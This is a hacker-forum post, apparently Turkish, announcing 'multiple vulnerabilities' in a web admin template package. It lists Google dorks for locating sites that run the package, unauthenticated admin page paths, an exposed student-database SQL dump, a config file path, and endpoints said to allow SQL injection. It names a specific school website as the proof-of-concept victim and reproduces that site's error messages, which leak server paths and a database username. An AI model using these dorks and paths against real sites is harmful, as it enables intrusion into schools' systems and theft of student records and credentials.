Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: PlSoftware Solution WebNestIT SB Admin V2 Multiple Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,386 / 1,386
Deneyim: 46 / 100
Rep Sayısı: 2874
Mesaj Sayısı: 6512
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
PlSoftware Solution WebNestIT SB Admin V2 Multiple Vuln
05.09.2018 01:21
################################################################################​#################

# Exploit Title : Web Design Plsoftware Solution Web Nest IT SB Admin V2 Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 05/09/2018
# Vendor Homepage : developers.nest.com ~ webnestbd.com
# Tested On : Windows
# Software Information Links =>
+ startbootstrap.com/template-overviews/sb-admin-2/
+ npmjs.com/package/startbootstrap-sb-admin-2
+ usebootstrap.com/theme/sb-admin-2
+ samara.computer/531_adaptive/startbootstrap-master/startbootstrap-master/sb-admin-v2.php
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-284 [Improper Access Control ] - CWE-287 - [ Improper Authentication ]

################################################################################​#################

# Google Dorks :

intext:''Powered by plsoftware solution''

intext:''Developed By: Web Nest IT''

intext:''@Copyright 2015. All Rights Reserved. Develop By: Web Nest IT''

It does not require no username and password.

# Exploit =>

/software/adminhtml/pages/index.html
/software/adminhtml/pages/flot.html
/software/adminhtml/pages/morris.html
/software/adminhtml/pages/tables.html
/software/adminhtml/pages/forms.html
/software/adminhtml/pages/panels-wells.html
/software/adminhtml/pages/buttons.html
/software/adminhtml/pages/notifications.html
/software/adminhtml/pages/typography.html
/software/adminhtml/pages/icons.html
/software/adminhtml/pages/grid.html
/software/adminhtml/pages/login.html

# phpMyAdmin SQL Dump Vulnerability =>

Exploit => /software/ibit_student_info.sql

# Configuration File Path Exploit =>

/software/includes/config.php

# SQL Injection Vulnerability on Critical Lines =>

/software/send_application.php
/software/student_details.php
/software/wn-admin/login.php
/software/includes/result_back.php

################################################################################​#################

# Example Site => msahs.edu.bd/software/adminhtml/pages/index.html => [ Proof of Concept ] => archive.is/9vb6s

# SQL Database Errors =>

Warning: Cannot modify header information - headers already sent by
(output started at /home/msahsedu/public_html/software/send_application.php:45)
in /home/msahsedu/public_html/software/includes/functions.php on line 640

Warning: Cannot modify header information - headers already sent by
(output started at /home/msahsedu/public_html/software/student_details.php:13)
in /home/msahsedu/public_html/software/includes/student_function.php on line 162

Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'msahsedu_softwar'@'localhost'
(using password: YES) in /home/msahsedu/public_html/software/wn-admin/includes/config.php on line 2

Fatal error: Call to undefined function result_show() in /home/msahsedu/public_html/software/includes/result_back.php on line 3

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi